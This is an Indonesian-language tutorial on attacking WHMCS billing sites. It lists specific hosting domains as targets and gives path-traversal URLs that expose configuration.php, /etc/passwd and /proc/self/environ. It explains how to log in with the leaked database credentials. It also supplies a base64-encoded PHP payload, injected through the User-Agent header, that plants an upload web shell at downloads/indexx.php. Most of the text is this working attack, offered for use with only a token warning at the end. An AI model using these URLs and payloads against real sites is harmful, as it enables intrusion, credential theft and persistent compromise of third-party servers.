WHMCS Exploit with LFI and Tamper Data

Ada yang tau apa itu LFI ??
kalo yg belum saya akan menjelaskan sedikit apa itu LFI .
LFI a.k.a Local File Inclusion adalah sebuah bug atau letak kesalahan dimana kita bisa mengetahui konfigurasi system hanya dengan melalui URL, dan bisa dimanfaatkan untuk bisa mengakses Web target kita.

Oke langsung saja kita bahas sama sama :

1. Google Dork, dorknya sama kaya yang submitticket hanya rubah ja nanti dengan exploitnya.

2. Example  :

http://www.hosting.joomi.co.il/cart.php
http://www.hosty.nl/cart.php
http://mijn.h5hosting.nl/cart.php
http://www.tele-asia.net/billing/cart.php
http://test.idcbest.hk/cart.php
http://client.mousenet.net/cart.php
http://hostxweb.com/client/cart.php
http://customer.leohost.net/cart.php
http://area-clienti.cambali.it/cart.php
http://billing.edom.hu/cart.php
http://xtremehost.herobo.com/cart.php 
http://www.nethosting.freeiz.com/clientes/cart.php

Di atas kita hanya memanfaatkan memalui cart.php atau bisa juga dengan yg lain nya , yg memiliki kerentanan.

3. Kemudian masukkan exploit LFI :

cart.php?a=vicky-cyber&templatefile=../../../configuration.php

Sehingga misalnya kita contohkan seperti ini, :

http://www.nethosting.freeiz.com/clientes/cart.php?a=vicky-cyber&templatefile=../../../configuration.php 

4. Liat Source Web tersebut dengan menekan Ctrl+u  atau bisa juga klick kanan View Page Source, scroll kebawah dan lihat disana ada configuration webnya :D. asikk
Bagaimana cara mengoneksikanya?? : 
5.Ada beberapa cara untuk mengkonekan Configuration tersebut :

- Menggunakan ftp
- Menggunakan navicat for mysql  ---> Download
- Filezilla  ---> Download
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu )  --> Download.

Anda tidak bisa mengkonekan sembarangan dengan port default, tentunya kita harus mengetahui port yang terbuka terlebih dahulu, untuk bisa mengakses semua Filenya, ada beberapa cara juga untuk mengecek portnya, diantaranya bisa menggunakannmap bisa juga memakai port scanner yg ada di shell :D.

Ada Cara kedua selain mengkonekan dengan cara tersebut.
Caranya dengan menggunakan tamper data.

1. Install Dulu addons tamper data yg ada di mozilla
2. Setelah di install , kita cek /etc/passwdnya :

http://www.nethosting.freeiz.com/clientes/cart.php?a=Vicky-Cyber&templatefile=../../../../../../../../../../../../../../../../etc/passwd

Kalo muncul , otomatis /proc/self/environ nya pun muncul, kita lihat muncul tidak :

http://www.nethosting.freeiz.com/clientes/cart.php?a=Vicky-Cyber&templatefile=../../../../../../../proc/self/environ

3. Kemudian buka tamper lalu refresh , Klik tamper.. jangan Submit ataupun Cancel pastinya ;)
Disitu ada kolom User Agent, hapus tulisan yang Mozilla blablabla lalu ganti dengan :

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiZG93bmxvYWRzL2luZGV4eC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

Lalu ok, setelah proses tamper selsai, lalu kita cek apakah muncul tempat upload ??

http://www.nethosting.freeiz.com/clientes/downloads/indexx.php

/downloads/indexx.php << adalah path yang ada di exploit tersebut.

Gunakan Cara ini dengan bijak,, Jangan sampai di salah gunakan,,  ;)